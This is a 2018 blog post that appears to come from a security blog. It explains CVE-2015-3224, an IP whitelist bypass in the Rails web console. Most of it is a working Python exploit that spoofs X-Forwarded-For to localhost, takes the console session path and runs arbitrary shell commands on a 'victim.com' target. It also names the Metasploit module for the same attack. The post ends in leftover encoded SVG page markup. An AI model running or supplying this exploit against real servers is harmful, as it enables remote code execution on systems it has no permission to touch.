16 Oct 2018
This post is to get you understanding on the vulnerability and ways to exploit.
About
This exploits are in the wild and affecting all Ruby on Rails web application version 4.0.x and 4.1.x where the web console is enable which is default to development and test environment.
Vulnerability
The vulnerability relies on IP whitelist in the developer web console so that only allowed IP can view the web console.
Exploit
The exploit is to craft remote request to spoof their origin and bypassing the IP whitelist to use the web console. This cause in Remote Code Execution (RCE) to target web application. This exploit is also affect code execution on Rails 4.2.x if the attack is launched from whitelisted IP range. If the whitelisted IP is localhost, you might need to use local proxy to exploit this application.
Techniques
The example here is written in Python. When dealing with web, I like to use python requests library since it is very easy to use. The first part is to get 404 on the Rails application. This can easily be done by appending any non-existing page in the url.
#!/usr/bin/python3
import requests
url = 'http://victim.com/'
response = requests.get(url + 'non-existing-page')
print response.status_code # should be 404
If viewing on web, you should see Rails debug information if the application is in development mode. Moving on!
Next important part is to spoof the origin with X-Forwarded-For header.
The X-Forwarded-For HTTP header field is a common method for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer.
Source: Wikipedia
By setting the X-Forwarded-For header to localhost, this will spoof the server origin whitelist IP (which is allowed in localhost) and allowing us to view and use the web console.
...
header = {
'X-Forwarded-For' : '::1'
}
response = requests.get(url + 'non-existing-page', headers=header)
...
After spoofing the origin, the console should be seen. You can type arbitary command between the backticks enclosure to run shell commands. To do this in python, you need to grab the remote console session path first. This can easily be done using python regex library.
#!/usr/bin/python3
import requests
import re
url = 'http://victim.com/'
header = {
'X-Forwarded-For' : '::1'
}
response = requests.get(url + 'non-existing-page', headers=header)
console_remote_path = re.findall("data-remote-path='(.*)'", response.text)[0]
print console_remote_path
After getting the console_remote_path you can interact with the web console by using PUT request method inside while loop. You should now have a working python exploit script. Cheers!
...
url = url + console_remote_path
while True:
header = {
'X-Forwarded-For': '::1',
'Accept': 'application/vnd.web-console.v2',
'X-Requested-With': 'XMLHttpRequest'
}
cmd = raw_input('cmd> ')
if cmd == 'exit' or cmd == 'quit':
break
elif cmd == ' ':
continue
cmd = '`' + cmd + '`' # Important! running shell command should be enclosed between backticks
data = {'input': cmd}
response = requests.put(url, data=data, headers=header)
# beautify output
content = response.text.split('\\n')[0:-2]
for line in content:
line = line.strip('\\')
line = line.split('"', -1)[-1]
print(line)
For further exploitation on getting a reverse shell, you should visit my other blog post specifically on reverse shell.
Exploiting using Metasploit
Using Metasploit has other advantages of managing between sessions and running modules for further exploitation.
To exploit this vulnerability using Metasploit, you can use exploit/multi/http/rails_web_console_v2_code_exec. Set RHOST and RPORT to match your victim Rails web service. Finally run exploit to start exploiting the target. Note that when using Metasploit, RHOST must be an IP address not a hostname.
This vulnerability was reported by both joernchen of Phenoelit and Ben Murphy.
Reference:
URL: https://www.cvedetails.com/cve/cve-2015-3224
URL: http://openwall.com/lists/oss-security/2015/06/16/18
URL: https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ
URL: https://hackerone.com/reports/44513
'%3E%3Cg id='Group'%3E%3Cg id='Combined Shape'%3E%3Cuse xlink:href='%23path0_fill' transform='translate(5201.49 697.468)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Logo'%3E%3Cg id='Fill 1'%3E%3Cuse xlink:href='%23path1_fill' transform='translate(5188.19 700.863)' fill='%23FF9100'/%3E%3C/g%3E%3Cg id='Fill 2'%3E%3Cuse xlink:href='%23path2_fill' transform='translate(5188.19 700.863)' fill='%23FFDD00'/%3E%3C/g%3E%3Cg id='Fill 3'%3E%3Cuse xlink:href='%23path3_fill' transform='translate(5186.75 699.413)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Stroke 4'%3E%3Cuse xlink:href='%23path4_stroke' transform='translate(5186.75 699.413)'/%3E%3C/g%3E%3Cg id='Fill 6'%3E%3Cuse xlink:href='%23path5_fill' transform='translate(5188.24 697.056)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Group 11'%3E%3Cg id='Stroke 7'%3E%3Cuse xlink:href='%23path6_stroke' transform='translate(5188.24 697.056)' fill='%23050505'/%3E%3C/g%3E%3Cg id='Stroke 9'%3E%3Cuse xlink:href='%23path7_stroke' transform='translate(5187.29 700.863)'/%3E%3C/g%3E%3C/g%3E%3Cg id='Fill 12'%3E%3Cuse xlink:href='%23path8_fill' transform='translate(5187.07 705.304)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Stroke 13'%3E%3Cuse xlink:href='%23path9_stroke' transform='translate(5187.07 705.304)'/%3E%3C/g%3E%3C/g%3E%3Cg id='Oval' opacity='0.2'%3E%3Cmask id='mask0_outline_ins'%3E%3Cuse xlink:href='%23path10_fill' fill='white' transform='translate(5180.65 701.166)'/%3E%3C/mask%3E%3Cg mask='url(%23mask0_outline_ins)'%3E%3Cuse xlink:href='%23path11_stroke_2x' transform='translate(5180.65 701.166)' fill='%23FFFFFF'/%3E%3C/g%3E%3C/g%3E%3Cg id='Oval' opacity='0.2'%3E%3Cuse xlink:href='%23path12_fill' transform='translate(5200.84 707.692)' fill='%23FFFFFF'/%3E%3C/g%3E%3Cg id='Oval'%3E%3Cuse xlink:href='%23path12_fill' transform='translate(5184.56 712.696)' fill='%23FFFFFF'/%3E%3C/g%3E%3C/g%3E%3C/g%3E%3Cdefs%3E%3Cpath id='path0_fill' fill-rule='evenodd' d='M 1.11914 0.172241C 1.02246 0.272827 0.962891 0.409363 0.962891 0.559753L 0.962891 0.962952L 0.55957 0.962952C 0.250488 0.962952 0 1.21356 0 1.52277C 0 1.83191 0.250488 2.08252 0.55957 2.08252L 0.962891 2.08252L 0.962891 2.48566C 0.962891 2.7948 1.21338 3.04547 1.52246 3.04547C 1.83203 3.04547 2.08252 2.7948 2.08252 2.48566L 2.08252 2.08252L 2.48584 2.08252C 2.79492 2.08252 3.04541 1.83191 3.04541 1.52277C 3.04541 1.21356 2.79492 0.962952 2.48584 0.962952L 2.08252 0.962952L 2.08252 0.559753C 2.08252 0.25061 1.83203 0 1.52246 0C 1.36377 0 1.2207 0.06604 1.11914 0.172241Z'/%3E%3Cpath id='path1_fill' fill-rule='evenodd' d='M 5.02978 0.0305451L 0 0L 2.46998 15.7258L 3.00889 15.7258L 7.94885 15.7258L 8.48776 15.7258L 10.9577 0L 5.02978 0.0305451Z'/%3E%3Cpath id='path2_fill' fill-rule='evenodd' d='M 5.02978 0.0305451L 0 0L 2.46998 15.7258L 3.00889 15.7258L 6.69141 15.7258L 7.23031 15.7258L 9.7003 0L 5.02978 0.0305451Z'/%3E%3Cpath id='path3_fill' fill-rule='evenodd' d='M 0 1.45021L 12.9786 1.45021L 12.9786 0L 0 0L 0 1.45021Z'/%3E%3Cpath id='path4_stroke' d='M 0 1.45021L -0.440282 1.45021L -0.440282 1.8905L 0 1.8905L 0 1.45021ZM 12.9786 1.45021L 12.9786 1.8905L 13.4189 1.8905L 13.4189 1.45021L 12.9786 1.45021ZM 12.9786 0L 13.4189 0L 13.4189 -0.440282L 12.9786 -0.440282L 12.9786 0ZM 0 0L 0 -0.440282L -0.440282 -0.440282L -0.440282 0L 0 0ZM 0 1.8905L 12.9786 1.8905L 12.9786 1.00993L 0 1.00993L 0 1.8905ZM 13.4189 1.45021L 13.4189 0L 12.5384 0L 12.5384 1.45021L 13.4189 1.45021ZM 12.9786 -0.440282L 0 -0.440282L 0 0.440282L 12.9786 0.440282L 12.9786 -0.440282ZM -0.440282 0L -0.440282 1.45021L 0.440282 1.45021L 0.440282 0L -0.440282 0Z'/%3E%3Cpath id='path5_fill' fill-rule='evenodd' d='M 8.98176 0L 5.88305 0L 4.04179 0L 0.943084 0L 0 2.17532L 4.04179 2.17532L 5.88305 2.17532L 9.92484 2.17532L 8.98176 0Z'/%3E%3Cpath id='path6_stroke' d='M 8.98176 0L 9.38571 -0.175129L 9.27076 -0.440282L 8.98176 -0.440282L 8.98176 0ZM 0.943084 0L 0.943084 -0.440282L 0.654085 -0.440282L 0.539131 -0.175129L 0.943084 0ZM 0 2.17532L -0.403953 2.00019L -0.670758 2.6156L 0 2.6156L 0 2.17532ZM 9.92484 2.17532L 9.92484 2.6156L 10.5956 2.6156L 10.3288 2.00019L 9.92484 2.17532ZM 8.98176 -0.440282L 5.88305 -0.440282L 5.88305 0.440282L 8.98176 0.440282L 8.98176 -0.440282ZM 5.88305 -0.440282L 4.04179 -0.440282L 4.04179 0.440282L 5.88305 0.440282L 5.88305 -0.440282ZM 4.04179 -0.440282L 0.943084 -0.440282L 0.943084 0.440282L 4.04179 0.440282L 4.04179 -0.440282ZM 0.539131 -0.175129L -0.403953 2.00019L 0.403953 2.35045L 1.34704 0.175129L 0.539131 -0.175129ZM 0 2.6156L 4.04179 2.6156L 4.04179 1.73504L 0 1.73504L 0 2.6156ZM 4.04179 2.6156L 5.88305 2.6156L 5.88305 1.73504L 4.04179 1.73504L 4.04179 2.6156ZM 5.88305 2.6156L 9.92484 2.6156L 9.92484 1.73504L 5.88305 1.73504L 5.88305 2.6156ZM 10.3288 2.00019L 9.38571 -0.175129L 8.5778 0.175129L 9.52089 2.35045L 10.3288 2.00019Z'/%3E%3Cpath id='path7_stroke' d='M 5.92796 0.0305451L 5.92569 0.470845L 5.93023 0.470821L 5.92796 0.0305451ZM 0 0L 0.00226862 -0.440276L -0.515251 -0.442943L -0.43495 0.0683159L 0 0ZM 2.46998 15.7258L 2.03503 15.7941L 2.09346 16.166L 2.46998 16.166L 2.46998 15.7258ZM 9.38594 15.7258L 9.38594 16.166L 9.76246 16.166L 9.82089 15.7941L 9.38594 15.7258ZM 11.8559 0L 12.2909 0.0683159L 12.3712 -0.442943L 11.8537 -0.440276L 11.8559 0ZM 5.93023 -0.409731L 0.00226862 -0.440276L -0.00226862 0.440276L 5.92569 0.470821L 5.93023 -0.409731ZM -0.43495 0.0683159L 2.03503 15.7941L 2.90493 15.6574L 0.43495 -0.0683159L -0.43495 0.0683159ZM 2.46998 16.166L 3.00889 16.166L 3.00889 15.2855L 2.46998 15.2855L 2.46998 16.166ZM 3.00889 16.166L 8.84703 16.166L 8.84703 15.2855L 3.00889 15.2855L 3.00889 16.166ZM 8.84703 16.166L 9.38594 16.166L 9.38594 15.2855L 8.84703 15.2855L 8.84703 16.166ZM 9.82089 15.7941L 12.2909 0.0683159L 11.421 -0.0683159L 8.95099 15.6574L 9.82089 15.7941ZM 11.8537 -0.440276L 5.92569 -0.409731L 5.93023 0.470821L 11.8582 0.440276L 11.8537 -0.440276Z'/%3E%3Cpath id='path8_fill' fill-rule='evenodd' d='M 12.2601 0L 6.34287 0L 5.91723 0L 0 0L 1.10682 6.25405L 6.13005 6.19953L 11.1533 6.25405L 12.2601 0Z'/%3E%3Cpath id='path9_stroke' d='M 12.2601 0L 12.6936 0.0767275L 12.7851 -0.440282L 12.2601 -0.440282L 12.2601 0ZM 0 0L 0 -0.440282L -0.525044 -0.440282L -0.433545 0.0767275L 0 0ZM 1.10682 6.25405L 0.673277 6.33077L 0.73833 6.69835L 1.1116 6.6943L 1.10682 6.25405ZM 6.13005 6.19953L 6.13483 5.75917L 6.12527 5.75927L 6.13005 6.19953ZM 11.1533 6.25405L 11.1485 6.6943L 11.5218 6.69835L 11.5868 6.33077L 11.1533 6.25405ZM 12.2601 -0.440282L 6.34287 -0.440282L 6.34287 0.440282L 12.2601 0.440282L 12.2601 -0.440282ZM 6.34287 -0.440282L 5.91723 -0.440282L 5.91723 0.440282L 6.34287 0.440282L 6.34287 -0.440282ZM 5.91723 -0.440282L 0 -0.440282L 0 0.440282L 5.91723 0.440282L 5.91723 -0.440282ZM -0.433545 0.0767275L 0.673277 6.33077L 1.54037 6.17732L 0.433545 -0.0767275L -0.433545 0.0767275ZM 1.1116 6.6943L 6.13483 6.63978L 6.12527 5.75927L 1.10204 5.81379L 1.1116 6.6943ZM 6.12527 6.63978L 11.1485 6.6943L 11.1581 5.81379L 6.13483 5.75927L 6.12527 6.63978ZM 11.5868 6.33077L 12.6936 0.0767275L 11.8266 -0.0767275L 10.7197 6.17732L 11.5868 6.33077Z'/%3E%3Cpath id='path10_fill' fill-rule='evenodd' d='M 1.845 3.69804C 2.86397 3.69804 3.69001 2.87021 3.69001 1.84902C 3.69001 0.827835 2.86397 0 1.845 0C 0.826036 0 0 0.827835 0 1.84902C 0 2.87021 0.826036 3.69804 1.845 3.69804Z'/%3E%3Cpath id='path11_stroke_2x' d='M 1.845 5.11673C 3.6504 5.11673 5.10869 3.65082 5.10869 1.84902L 2.27132 1.84902C 2.27132 2.0896 2.07754 2.27936 1.845 2.27936L 1.845 5.11673ZM 5.10869 1.84902C 5.10869 0.0472286 3.6504 -1.41869 1.845 -1.41869L 1.845 1.41869C 2.07754 1.41869 2.27132 1.60844 2.27132 1.84902L 5.10869 1.84902ZM 1.845 -1.41869C 0.0396073 -1.41869 -1.41869 0.0472286 -1.41869 1.84902L 1.41869 1.84902C 1.41869 1.60844 1.61246 1.41869 1.845 1.41869L 1.845 -1.41869ZM -1.41869 1.84902C -1.41869 3.65082 0.0396073 5.11673 1.845 5.11673L 1.845 2.27936C 1.61246 2.27936 1.41869 2.0896 1.41869 1.84902L -1.41869 1.84902Z'/%3E%3Cpath id='path12_fill' fill-rule='evenodd' d='M 0.868237 1.74026C 1.34775 1.74026 1.73647 1.35069 1.73647 0.870128C 1.73647 0.38957 1.34775 0 0.868237 0C 0.388723 0 0 0.38957 0 0.870128C 0 1.35069 0.388723 1.74026 0.868237 1.74026Z'/%3E%3C/defs%3E%3C/svg%3E%0A)